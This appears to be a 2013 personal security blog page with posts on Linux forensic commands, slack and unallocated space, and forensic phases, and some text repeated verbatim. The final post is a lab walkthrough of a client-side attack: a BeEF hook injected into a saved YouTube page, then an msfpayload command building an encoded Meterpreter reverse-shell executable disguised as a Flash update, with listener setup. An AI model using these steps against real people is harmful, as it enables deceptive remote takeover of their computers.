Friday, 24 May 2013
Linux commands for computer forensics
Here are some of linux basic command that used in computer forensics :
1. dd - command used to copy from an input file or device to an output file or device.
syntax : dd if=[source] of=[destination] bs=(optional)
2. hdparm - command to get evidence harddisk information.
syntax : hdparm [ flags ] [device]
3. sfdisk and fdisk - command to determine the disk structure.
syntax :
sfdisk [options] device
sfdisk -s [partition]
4. md5sum and sha1sum - create and store an MD5 or SHA hash of file or list of files (including devices). syntax :
md5sum [OPTION] [FILE]...
md5sum [OPTION] --check [FILE]
sha1sum [OPTION] [FILE]...
sha1sum [OPTION] --check [FILE]
5. mount - mount a file system.
syntax :
mount [-lhV]
mount -a [-fFnrsvw] [-t vfstype] [-O optlist]
mount [-fnrsvw] [-o options [,...]] device | dir
mount [-fnrsvw] [-t vfstype] [-o options] device dir
6. etc..
1. dd - command used to copy from an input file or device to an output file or device.
syntax : dd if=[source] of=[destination] bs=(optional)
2. hdparm - command to get evidence harddisk information.
syntax : hdparm [ flags ] [device]
3. sfdisk and fdisk - command to determine the disk structure.
syntax :
sfdisk [options] device
sfdisk -s [partition]
4. md5sum and sha1sum - create and store an MD5 or SHA hash of file or list of files (including devices). syntax :
md5sum [OPTION] [FILE]...
md5sum [OPTION] --check [FILE]
sha1sum [OPTION] [FILE]...
sha1sum [OPTION] --check [FILE]
5. mount - mount a file system.
syntax :
mount [-lhV]
mount -a [-fFnrsvw] [-t vfstype] [-O optlist]
mount [-fnrsvw] [-o options [,...]] device | dir
mount [-fnrsvw] [-t vfstype] [-o options] device dir
6. etc..
Thursday, 23 May 2013
Computer Forensic : unallocated space and slack space
Unalocated
space : Unallocated space, sometimes called “free space”, is logical space on a
hard drive that the operating system, e.g Windows, can write to. To put it
another way it is the opposite of “allocated” space, which is where the
operating system has already written files to. Unallocated space can contain deleted
files or partially deleted files. When a
file is deleted, the pointers to the file are removed, but the data remains in
unallocated space until such time as the operating system stores another file
in the same space, thereby over-writing the data.
Slack
space : Slack space refers to portions of a hard drive that are not fully used
by the current allocated file and which may contain data from a previously
deleted file. Slack space or sometimes referred to as file slack is the area
between the end of a fileand end of the last cluster or sector used by the file
in question. Slackspace is common in file systems that use a large cluster
size, while the file system that uses a small cluster size can organize the
storage media more effectively and efficiently. A cluster is the smallest unit
of storage that the operating system can deal with. When a file is written, and
does not occupy the entire cluster, the remaining space is slack space.
Computer Forensic : Introduction
Hello again, today my blog post is about Computer Forensic, one of my favourite subject in computer security world. What is Computer Forensic? Computer forensics is the application of
investigation and analysis techniques to gather and preserve evidence from a
particular computing device in a way that is suitable for presentation in a
court of law. The goal of computer forensics is to perform a structured
investigation while maintaining a documented chain of evidence to find out
exactly what happened on a computing device and who was responsible for it.
Computer forensics involves the preservation, identification, extraction,
interpretation, and documentation of computer evidence.
So, what is the differences between Computer Forensic and Digital Forensic? Digital forensics (sometimes known as digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover investigation of all devices capable of storing digital data.
There are 4 phases of Digital Forensic :
1. Identification (Crime scene) --> identify all of the digital evidences
2. Collecting (Lab)
a. Chain of custody --> collecting, labeling and documenting all of the digital evidences
b. Acquisition --> make clones of digital evidences
c. Fingerprint --> create hash file
3. Analysis (Lab)
a. Chain of Custody --> change permisssion of digital evidence to read-only
b. Analysis --> perform analysis from the clone of digital evidences
c. Collecting --> summarize the results found
d. Reconstruction --> construct the case into timeframe
4. Presentation (Court / Law)
There are 2 conditions when performing forensic activity :
1. Live : when the digital evidences still alive/turn on. In this case the investigator can also clone the RAM
2. Dead : when the digital evidences have been torned off.
So, what is the differences between Computer Forensic and Digital Forensic? Digital forensics (sometimes known as digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover investigation of all devices capable of storing digital data.
There are 4 phases of Digital Forensic :
1. Identification (Crime scene) --> identify all of the digital evidences
2. Collecting (Lab)
a. Chain of custody --> collecting, labeling and documenting all of the digital evidences
b. Acquisition --> make clones of digital evidences
c. Fingerprint --> create hash file
3. Analysis (Lab)
a. Chain of Custody --> change permisssion of digital evidence to read-only
b. Analysis --> perform analysis from the clone of digital evidences
c. Collecting --> summarize the results found
d. Reconstruction --> construct the case into timeframe
4. Presentation (Court / Law)
There are 2 conditions when performing forensic activity :
1. Live : when the digital evidences still alive/turn on. In this case the investigator can also clone the RAM
2. Dead : when the digital evidences have been torned off.
Monday, 20 May 2013
From web application to ID 0
How to gaining access to local system from web application? in this post i will simulate the process of gaining access using DVWA installed on Metasploitable OS as a target. i will use the one of several vulnerabilities of DVWA to penetrate the system, put the backdoor shell command, gaining root access, and doing some post exploitation activities.
--on progress--
--on progress--
Sunday, 19 May 2013
Client side attack combination using BeEF and Metasploit
Hello again, in this post i will simulate the client side attack using Beef and metasploit. client side attack is the attack performed by the client. in this simulation i am using windows xp in virtualbox and firefox browser as a target.
Here's the gameplay :
1. attacker send the link of youtube website to the target that contain file hook.js from BeEF
2. when the target open the link, BeEf will hook the target.
3. attacker will send the fake javascript update .exe that contain payload from metasploit
3. target click the update and the system will be pwned.
And here's the steps :
- choose a video on youtube and save page as youtube.html and put in /var/www/
- run the BeEF from menu backtrack > exploitation > social engineering tools > BeEF
- modify the youtube.html and insert the hook.js
- run the infected html file in target's browser
- open BeEF panel in backtrack's browser, the address is 192.168.56.1:3000/ui/panel
- the target's browser is successfully hooked by BeEF
- create the fake exe file update using metasploit
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=1234 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/flashupdate.exe
- run metasploit (msfconsole) and listening on port 1234
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 1234
exploit
- send the payload file with redirect browser command in BeEF
- execute the file
- Voila! the system is pwned!
Subscribe to:
Posts (Atom)